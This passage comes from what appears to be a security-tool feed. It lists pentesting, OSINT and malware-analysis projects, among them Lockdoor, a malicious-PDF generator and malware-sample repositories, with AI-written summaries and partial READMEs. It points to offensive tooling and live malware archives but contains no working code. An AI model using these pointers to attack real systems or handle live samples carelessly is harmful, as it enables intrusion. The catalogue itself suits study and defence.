&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lockdoor is a pentesting framework that aggregates a variety of tools for tasks such as information gathering, web hacking, privilege escalation, and reverse engineering. Its notable features include a collection of pre-configured tools categorized by function, support for multiple operating systems, and the ability to generate security assessment reports. However, it is important to note that the project is no longer actively maintained.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://avatars.githubusercontent.com/u/55242164?s=400"&gt;
&lt;/p&gt;
&lt;h2 align="center"&gt; Lockdoor v2.3&lt;br&gt;
⚠️ This project is not maintained anymore. ⚠️
&lt;/h2&gt;
&lt;h1 id="find-more-at-httpsgcokgsttyrjjp"&gt;Find more at &lt;a href="https://g.co/kgs/TtYRJJP"&gt;https://g.co/kgs/TtYRJJP&lt;/a&gt;&lt;/h1&gt;
&lt;h1 id="table-of-contents"&gt;Table of contents&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#table-of-contents"&gt;Table of contents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#changelog---"&gt;Changelog 📌 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#badges--"&gt;Badges 📌 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#support-me--"&gt;Support me 💰 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributors--"&gt;Contributors ⭐ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#versions"&gt;Versions&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#062021--23"&gt;06/2021 : 2.3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#032020--223"&gt;03/2020 : 2.2.3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#blogs--articles--"&gt;Blogs &amp;amp; Articles 📰 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#overview--"&gt;Overview 📙 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#features--"&gt;Features 📙 :&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#pentesting-tools-selection--"&gt;Pentesting Tools Selection 📙 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#resources-and-cheatsheets--"&gt;Resources and cheatsheets 📙 :&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#screenshots--"&gt;Screenshots 💻 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#demos--"&gt;Demos 💻 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#installation-%EF%B8%8F-"&gt;Installation 🛠️ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lockdoor-tools-contents-%EF%B8%8F-"&gt;Lockdoor Tools contents 🛠️ :&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#information-gathering-mag_right-"&gt;&lt;strong&gt;Information Gathering&lt;/strong&gt; :mag_right: :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#web-hacking--"&gt;&lt;strong&gt;Web Hacking&lt;/strong&gt; 🌐 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-escalation-%EF%B8%8F-"&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt; ⚠️ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#reverse-engineering-"&gt;&lt;strong&gt;Reverse Engineering&lt;/strong&gt; ⚡:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploitation-"&gt;&lt;strong&gt;Exploitation&lt;/strong&gt; ❗:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#shells-"&gt;&lt;strong&gt;Shells&lt;/strong&gt; 🐚:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#password-attacks-%EF%B8%8F"&gt;&lt;strong&gt;Password Attacks&lt;/strong&gt; ✳️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#encryption---decryption-%EF%B8%8F"&gt;&lt;strong&gt;Encryption - Decryption&lt;/strong&gt; 🛡️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#social-engineering-"&gt;&lt;strong&gt;Social Engineering&lt;/strong&gt; 🎭:&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#lockdoor-resources-contents--"&gt;Lockdoor Resources contents 📚 :&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#information-gathering-mag_right-"&gt;&lt;strong&gt;Information Gathering&lt;/strong&gt; :mag_right: :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#crypto-%EF%B8%8F"&gt;&lt;strong&gt;Crypto&lt;/strong&gt; 🛡️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploitation-"&gt;&lt;strong&gt;Exploitation&lt;/strong&gt; ❗:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#networking--"&gt;&lt;strong&gt;Networking&lt;/strong&gt; 🖧 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#password-attacks-%EF%B8%8F-1"&gt;&lt;strong&gt;Password Attacks&lt;/strong&gt; ✳️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#post-exploitation-"&gt;&lt;strong&gt;Post Exploitation&lt;/strong&gt; ❗❗:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-escalation-%EF%B8%8F"&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt; ⚠️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pentesting--security-assessment-findings-report-templates--"&gt;&lt;strong&gt;Pentesting &amp;amp; Security Assessment Findings Report Templates&lt;/strong&gt; 📝 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#reverse-engineering--"&gt;&lt;strong&gt;Reverse Engineering&lt;/strong&gt; ⚡ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#social-engineering-"&gt;&lt;strong&gt;Social Engineering&lt;/strong&gt; 🎭:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#walk-throughs--"&gt;&lt;strong&gt;Walk Throughs&lt;/strong&gt; 🚶 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#web-hacking--"&gt;&lt;strong&gt;Web Hacking&lt;/strong&gt; 🌐 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#other--"&gt;&lt;strong&gt;Other&lt;/strong&gt; 📚 :&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributing-"&gt;&lt;strong&gt;Contributing&lt;/strong&gt; :&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="changelog---"&gt;Changelog 📌 :&lt;/h1&gt;
&lt;h4 id="version-v23-is-out-"&gt;Version v2.3 IS OUT !!&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt; - Fixing some CI 

 - making a more stable version 

 - new docker iaage build

 - adding packages for each supported distros
&lt;/code&gt;&lt;/pre&gt;
&lt;h1 id="badges--"&gt;Badges 📌 :&lt;/h1&gt;
&lt;p&gt;&lt;img src="http://ForTheBadge.com/images/badges/made-with-python.svg" alt="made-with-python"&gt;
&lt;img src="https://badgen.net/github/release/SofianeHamlaoui/Lockdoor-Framework" alt="GitHub"&gt;
&lt;img src="https://badgen.net/pypi/license/lockdoor" alt="License"&gt;
&lt;img src="https://img.shields.io/badge/Tested%20on%20%20-Linux%20%26%20Windows-blue" alt="TestedON"&gt;&lt;/p&gt;</description></item><item><title>lonkero</title><link>https://rainmana.github.io/hackyfeed/tools/bountyyfi-lonkero/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bountyyfi-lonkero/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lonkero is a professional-grade web security scanner engineered for advanced penetration testing, boasting over 125 sophisticated scanning modules written in Rust. Its notable features include an intelligent mode for context-aware scanning, machine learning capabilities to minimize false positives to 5%, and unique proof-based XSS detection that eliminates reliance on browsers, significantly increasing scan speed and accuracy. By leveraging a robust architecture that focuses on real vulnerabilities, Lonkero delivers efficient and precise security assessments for modern web technologies.&lt;/p&gt;</description></item><item><title>lumen</title><link>https://rainmana.github.io/hackyfeed/tools/naim94a-lumen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/naim94a-lumen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lumen is a private server designed to integrate with IDA Pro 7.2 and later versions, enabling users to efficiently manage and retrieve function signatures via its database-backed infrastructure utilizing PostgreSQL. It features an experimental HTTP API for querying by function hash or file, facilitating collaborative reverse engineering workflows. The tool is provisioned with a straightforward setup through Docker and can be used with custom TLS configurations for secure communications.&lt;/p&gt;</description></item><item><title>lunasec</title><link>https://rainmana.github.io/hackyfeed/tools/lunasec-io-lunasec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lunasec-io-lunasec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LunaTrace is an open-source supply chain security and auditing tool that monitors software dependencies for vulnerabilities, integrating seamlessly with GitHub to notify users of new CVEs before deployment. It offers both a free SaaS option and self-hosted deployment capabilities, making it a versatile alternative to commercial tools like GitHub Dependabot and Snyk. Notable features include automatic monitoring, GitHub Pull Request integration, and active development support.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;!--
 ~ Copyright by LunaSec (owned by Refinery Labs, Inc)
 ~
 ~ Licensed under the Creative Commons Attribution-ShareAlike 4.0 International
 ~ (the "License"); you may not use this file except in compliance with the
 ~ License. You may obtain a copy of the License at
 ~
 ~ https://creativecommons.org/licenses/by-sa/4.0/legalcode
 ~
 ~ See the License for the specific language governing permissions and
 ~ limitations under the License.
 ~
--&gt;
&lt;p align="center"&gt;
 &lt;img src='docs/static/img/logo-black-text.svg' width='60%'&gt;
&lt;/p&gt;</description></item><item><title>mailcat</title><link>https://rainmana.github.io/hackyfeed/tools/sharsil-mailcat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sharsil-mailcat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mailcat is a tool designed to discover existing email addresses based on a user&amp;rsquo;s nickname, supporting over 170 domains across 37 email providers. It offers functionality through scripts that can be run via Tor or proxy to maintain anonymity, and it employs various methods such as SMTP and API for address retrieval. Notable features include extensive provider support and options for managing connection limits to enhance performance.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="mailcat"&gt;mailcat&lt;/h1&gt;
&lt;p align="center"&gt;
	&lt;img src="https://github.com/sharsil/mailcat/blob/main/logo.png?raw=true" height="200"/&gt;
&lt;/p&gt;</description></item><item><title>makin</title><link>https://rainmana.github.io/hackyfeed/tools/secrary-makin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secrary-makin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;makin&lt;/code&gt; is a malware assessment tool designed to simplify the process of identifying anti-debugging techniques employed by malicious samples. It injects a DLL into the target process to monitor specific API calls, providing insights into debugger detection methods, and can generate IDA Pro scripts for setting breakpoints at the identified APIs. Notable features include the ability to hook various functions from &lt;code&gt;ntdll.dll&lt;/code&gt; and &lt;code&gt;kernelbase.dll&lt;/code&gt;, effectively revealing complex anti-debugging strategies.&lt;/p&gt;</description></item><item><title>mal_unpack</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-mal_unpack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-mal_unpack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; mal_unpack is a dynamic malware unpacker that leverages PE-sieve to deploy packed malware, allowing it to unpack and dump the payload while terminating the original process. Its primary use case is for malware analysis in controlled environments, with notable features including options for dumping implanted PEs, shellcodes, and modified artifacts, as well as performance enhancements through an auxiliary driver.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="mal_unpack"&gt;mal_unpack&lt;/h1&gt;
&lt;p&gt;&lt;img src="./logo/logo.png" alt=""&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ci.appveyor.com/project/hasherezade/mal-unpack"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/3cqqlah6unfhasik?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://app.codacy.com/gh/hasherezade/mal_unpack/dashboard?branch=master"&gt;&lt;img src="https://app.codacy.com/project/badge/Grade/fedbe124aa694761907bbe51bfc8d6f9" alt="Codacy Badge"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/commits"&gt;&lt;img src="https://img.shields.io/github/commit-activity/m/hasherezade/mal_unpack" alt="Commit activity"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/commits"&gt;&lt;img src="https://img.shields.io/github/last-commit/hasherezade/mal_unpack/master" alt="Last Commit"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/release/hasherezade/mal_unpack.svg" alt="GitHub release"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/release-date/hasherezade/mal_unpack?color=blue" alt="GitHub release date"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/hasherezade/mal_unpack/total.svg" alt="Github All Releases"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/hasherezade/mal_unpack/latest/total.svg" alt="Github Latest Release"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>malboxes</title><link>https://rainmana.github.io/hackyfeed/tools/gosecure-malboxes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gosecure-malboxes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Builds malware analysis Windows VMs so that you don&amp;rsquo;t have to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Builds malware analysis Windows VMs so that you don&amp;rsquo;t have to.&lt;/p&gt;</description></item><item><title>malcom</title><link>https://rainmana.github.io/hackyfeed/tools/tomchop-malcom/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tomchop-malcom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malcom is a malware communication analyzer that visualizes network traffic to identify interactions with known malware sources, thereby aiding in malware analysis and intelligence gathering. Its primary use case is to detect command and control servers, monitor peer-to-peer networks, and unravel DNS fast-flux infrastructures. Notable features include its ability to convert complex network traffic data into actionable intelligence and a user-friendly graphical interface for rapid analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="malcom---malware-communication-analyzer"&gt;Malcom - Malware Communication Analyzer&lt;/h1&gt;
&lt;p&gt;Malcom is a tool designed to analyze a system&amp;rsquo;s network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes handy when analyzing how certain malware species try to communicate with the outside world.&lt;/p&gt;</description></item><item><title>malicious-pdf</title><link>https://rainmana.github.io/hackyfeed/tools/jonaslejon-malicious-pdf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jonaslejon-malicious-pdf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malicious PDF is a tool designed to generate various malicious PDF files featuring phone-home capabilities for use in penetration testing and red-teaming. It supports integration with platforms like Burp Collaborator and Interact.sh, providing a diverse set of attack vectors through ten different crafted PDF examples meant for testing web applications, security products, and PDF readers. Key features include the ability to create PDFs exploiting vulnerabilities like external file access, JavaScript injection, and form data exfiltration.&lt;/p&gt;</description></item><item><title>malware_training_vol1</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-malware_training_vol1/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-malware_training_vol1/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;malware_training_vol1&amp;rdquo; repository provides a comprehensive training resource designed for individuals looking to deepen their understanding of Windows malware analysis. It offers a blend of theoretical knowledge and practical exercises covering a range of topics including PE structure, process management, and various malware tactics, while leveraging specific tools for effective analysis. Key features include structured modules, hands-on exercises, and a focus on core concepts essential for aspiring malware analysts.&lt;/p&gt;</description></item><item><title>Malware-Exhibit</title><link>https://rainmana.github.io/hackyfeed/tools/alvin-tosh-malware-exhibit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alvin-tosh-malware-exhibit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malware-Exhibit is a malware analysis tool designed for researchers and security professionals to dissect and analyze various malware samples. It supports multiple programming languages and platforms, allowing users to examine the behavior and characteristics of malware, providing insights for threat detection and mitigation. Notable features include a comprehensive user interface and the ability to integrate additional analysis tools and scripts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="./LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/Ileriayo/markdown-badges?style=for-the-badge" alt="Licence"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="-malware-exhibit-"&gt;&lt;h1 align="center"&gt;⚠️⚠️ Malware-Exhibit ⚠️⚠️&lt;/h1&gt;&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/c-%2300599C.svg?style=for-the-badge&amp;amp;logo=c&amp;amp;logoColor=white" alt="C"&gt;&lt;img src="https://img.shields.io/badge/c++-%2300599C.svg?style=for-the-badge&amp;amp;logo=c%2B%2B&amp;amp;logoColor=white" alt="C++"&gt;&lt;img src="https://img.shields.io/badge/go-%2300ADD8.svg?style=for-the-badge&amp;amp;logo=go&amp;amp;logoColor=white" alt="Go"&gt;&lt;img src="https://img.shields.io/badge/java-%23ED8B00.svg?style=for-the-badge&amp;amp;logo=java&amp;amp;logoColor=white" alt="Java"&gt;&lt;img src="https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&amp;amp;logo=javascript&amp;amp;logoColor=%23F7DF1E" alt="JavaScript"&gt;&lt;img src="https://img.shields.io/badge/perl-%2339457E.svg?style=for-the-badge&amp;amp;logo=perl&amp;amp;logoColor=white" alt="Perl"&gt;&lt;img src="https://img.shields.io/badge/ruby-%23CC342D.svg?style=for-the-badge&amp;amp;logo=ruby&amp;amp;logoColor=white" alt="Ruby"&gt;&lt;img src="https://img.shields.io/badge/php-%23777BB4.svg?style=for-the-badge&amp;amp;logo=php&amp;amp;logoColor=white" alt="PHP"&gt; &lt;img src="https://img.shields.io/badge/PowerShell-%235391FE.svg?style=for-the-badge&amp;amp;logo=powershell&amp;amp;logoColor=white" alt="PowerShell"&gt;&lt;img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&amp;amp;logo=python&amp;amp;logoColor=ffdd54" alt="Python"&gt;&lt;img src="https://img.shields.io/badge/r-%23276DC3.svg?style=for-the-badge&amp;amp;logo=r&amp;amp;logoColor=white" alt="R"&gt;&lt;img src="https://img.shields.io/badge/.NET-5C2D91?style=for-the-badge&amp;amp;logo=.net&amp;amp;logoColor=white" alt=".Net"&gt;&lt;img src="https://img.shields.io/badge/shell_script-%23121011.svg?style=for-the-badge&amp;amp;logo=gnu-bash&amp;amp;logoColor=white" alt="Shell Script"&gt;&lt;img src="https://img.shields.io/badge/typescript-%23007ACC.svg?style=for-the-badge&amp;amp;logo=typescript&amp;amp;logoColor=white" alt="TypeScript"&gt;&lt;img src="https://img.shields.io/badge/rust-%23000000.svg?style=for-the-badge&amp;amp;logo=rust&amp;amp;logoColor=white" alt="Rust"&gt;&lt;img src="https://img.shields.io/badge/Firefox-FF7139?style=for-the-badge&amp;amp;logo=Firefox-Browser&amp;amp;logoColor=white" alt="Firefox"&gt;&lt;img src="https://img.shields.io/badge/Edge-0078D7?style=for-the-badge&amp;amp;logo=Microsoft-edge&amp;amp;logoColor=white" alt="Edge"&gt;&lt;img src="https://img.shields.io/badge/Firebase-039BE5?style=for-the-badge&amp;amp;logo=Firebase&amp;amp;logoColor=white" alt="Firebase"&gt;&lt;img src="https://img.shields.io/badge/postgres-%23316192.svg?style=for-the-badge&amp;amp;logo=postgresql&amp;amp;logoColor=white" alt="Postgres"&gt;&lt;img src="https://img.shields.io/badge/PayPal-00457C?style=for-the-badge&amp;amp;logo=paypal&amp;amp;logoColor=white" alt="PayPal"&gt;&lt;img src="https://img.shields.io/badge/AWS-%23FF9900.svg?style=for-the-badge&amp;amp;logo=amazon-aws&amp;amp;logoColor=white" alt="AWS"&gt;&lt;img src="https://img.shields.io/badge/azure-%230072C6.svg?style=for-the-badge&amp;amp;logo=microsoftazure&amp;amp;logoColor=white" alt="Azure"&gt;&lt;img src="https://img.shields.io/badge/Oracle-F80000?style=for-the-badge&amp;amp;logo=oracle&amp;amp;logoColor=white" alt="Oracle"&gt;&lt;img src="https://img.shields.io/badge/Microsoft-0078D4?style=for-the-badge&amp;amp;logo=microsoft&amp;amp;logoColor=white" alt="Microsoft"&gt; &lt;img src="https://img.shields.io/badge/Android-3DDC84?style=for-the-badge&amp;amp;logo=android&amp;amp;logoColor=white" alt="Android"&gt; &lt;img src="https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&amp;amp;logo=linux&amp;amp;logoColor=black" alt="Linux"&gt; &lt;img src="https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&amp;amp;logo=ubuntu&amp;amp;logoColor=white" alt="Ubuntu"&gt; &lt;img src="https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&amp;amp;logo=macos&amp;amp;logoColor=F0F0F0" alt="macOS"&gt; &lt;img src="https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&amp;amp;logo=windows&amp;amp;logoColor=white" alt="Windows"&gt; &lt;img src="https://img.shields.io/badge/apache-%23D42029.svg?style=for-the-badge&amp;amp;logo=apache&amp;amp;logoColor=white" alt="Apache"&gt; &lt;img src="https://img.shields.io/badge/apache%20tomcat-%23F8DC75.svg?style=for-the-badge&amp;amp;logo=apache-tomcat&amp;amp;logoColor=black" alt="Apache Tomcat"&gt; &lt;img src="https://img.shields.io/badge/Apple-%23000000.svg?style=for-the-badge&amp;amp;logo=apple&amp;amp;logoColor=white" alt="Apple"&gt; &lt;img src="https://img.shields.io/badge/nginx-%23009639.svg?style=for-the-badge&amp;amp;logo=nginx&amp;amp;logoColor=white" alt="Nginx"&gt; &lt;img src="https://img.shields.io/badge/Google_Play-414141?style=for-the-badge&amp;amp;logo=google-play&amp;amp;logoColor=white" alt="Play Store"&gt; &lt;img src="https://img.shields.io/badge/F_Droid-1976D2?style=for-the-badge&amp;amp;logo=f-droid&amp;amp;logoColor=white" alt="F Droid"&gt; &lt;img src="https://img.shields.io/badge/App_Store-0D96F6?style=for-the-badge&amp;amp;logo=app-store&amp;amp;logoColor=white" alt="App Store"&gt; &lt;img src="https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&amp;amp;logo=github&amp;amp;logoColor=white" alt="GitHub"&gt; &lt;img src="https://img.shields.io/badge/xbox-%23107C10.svg?style=for-the-badge&amp;amp;logo=xbox&amp;amp;logoColor=white" alt="Xbox"&gt;&lt;/p&gt;</description></item><item><title>malware-samples</title><link>https://rainmana.github.io/hackyfeed/tools/fabrimagic72-malware-samples/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fabrimagic72-malware-samples/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The malware-samples repository is a curated collection of malware samples gathered from various honeypots managed globally, intended for research and analysis purposes. Users are encouraged to download, analyze, and reverse-engineer the samples while adhering to safety precautions, as the repository includes actual malware that may not be flagged by antivirus tools. Notably, all archived samples are password protected, with access secured by the password &amp;ldquo;infected.&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="malware-samples"&gt;malware-samples&lt;/h1&gt;
&lt;p&gt;A collection of malware samples caught by several honeypots i handle worldwide&lt;/p&gt;</description></item><item><title>malware-samples</title><link>https://rainmana.github.io/hackyfeed/tools/inquest-malware-samples/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/inquest-malware-samples/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The InQuest malware-samples repository serves as a curated collection of malware samples along with associated dissection details, primarily aimed at researchers and analysts in cybersecurity. Its notable features include a variety of sample types such as documents, executables, and macros, as well as links to in-depth analyses and reports, enhancing the understanding of malware behavior and leveraging for education and testing purposes. The tool is particularly useful for studying real-world exploit scenarios and dissecting malware payloads for security assessments.&lt;/p&gt;</description></item><item><title>malwoverview</title><link>https://rainmana.github.io/hackyfeed/tools/alexandreborges-malwoverview/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alexandreborges-malwoverview/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malwoverview is a versatile malware analysis tool designed for cybersecurity professionals to visualize and understand malware architecture without submitting samples to external endpoints, thereby ensuring compliance with Non-Disclosure Agreements. Its primary use case involves generating detailed reports on malware characteristics, and it offers a variety of analysis features, including dynamic and static analysis capabilities, and an intuitive user interface for enhanced usability. The tool is free and open-source, allowing users to modify and redistribute it under the GNU General Public License.&lt;/p&gt;</description></item><item><title>Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes</title><link>https://rainmana.github.io/hackyfeed/tools/xalgord-massive-web-application-penetration-testing-bug-bounty-notes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xalgord-massive-web-application-penetration-testing-bug-bounty-notes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Massive Web Application Penetration Testing Bug Bounty Notes repository provides a comprehensive guide tailored for both novice and advanced penetration testers, emphasizing methodologies for web application security assessments. It covers essential topics such as setting up testing environments, identifying and exploiting the OWASP Top 10 vulnerabilities, and practical resources like video tutorials for enhanced learning. Notable features include a structured approach to various testing phases, from foundational concepts to specific attack vectors related to session management, authentication, and business logic vulnerabilities.&lt;/p&gt;</description></item><item><title>matkap</title><link>https://rainmana.github.io/hackyfeed/tools/0x6rss-matkap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x6rss-matkap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Matkap is a cybersecurity tool designed for the analysis of malicious Telegram bots, primarily intended for educational and research purposes. It integrates with FOFA and URLScan to search for leaked bot tokens and chat IDs, allowing users to monitor and log Telegram interactions while offering functionalities to export harvest messages. Notable features include the ability to forward messages from malicious bots and comprehensive logging capabilities for monitoring bot tokens across various platforms.&lt;/p&gt;</description></item><item><title>misconfig-mapper</title><link>https://rainmana.github.io/hackyfeed/tools/intigriti-misconfig-mapper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/intigriti-misconfig-mapper/</guid><description>&lt;blockquote&gt;
